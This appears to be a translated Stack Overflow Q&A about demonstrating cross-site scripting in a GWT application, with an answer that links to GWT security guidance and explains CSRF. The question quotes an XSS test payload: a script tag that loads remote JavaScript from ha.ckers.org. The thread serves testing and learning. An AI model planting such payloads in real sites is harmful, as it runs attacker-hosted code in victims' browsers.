我一直在寻找通过 GWT(V2.4.0)演示一个示例 xss 攻击。我创建了一个带有 html 文本区域和一个提交按钮的表单(GET 方法),提交时它通过 gwt rpc 调用服务器,如果有一个 xss漏洞,示例测试用例//<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> //不应该被过滤。但这不起作用,任何人都可以分享如何执行xss攻击吗?只是一个概述或要点就可以了。
问问题
2266 次
1 回答
1
看看https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
有一个如何使用内部 html 发起攻击的示例。见章节
设置 innerHTML 的代码
它也在页面上给出了对策。
如果您在谈论 XSRF,那么按照建议
跨站点请求伪造(XSRF 或 CSRF)是一种网络攻击,攻击者可以在用户不知情的情况下代表经过身份验证的用户执行操作。通常,它涉及制作恶意 HTML 页面,一旦受害者访问该页面,将导致受害者的浏览器向第三方域发出攻击者控制的请求。如果受害者通过第三方域的身份验证,则请求将与该域的浏览器 cookie 一起发送,并且可能会在未经受害者同意的情况下代表受害者触发不良行为 - 例如,删除或修改博客或添加邮件转发规则。
您可以只创建一个页面来发送(未经身份验证的)rpc 请求,并且如果您的浏览器传递已通过身份验证的用户的 cookie 并且 rpc 调用成功,那么攻击就成功了。
于 2012-07-21T05:36:29.587 回答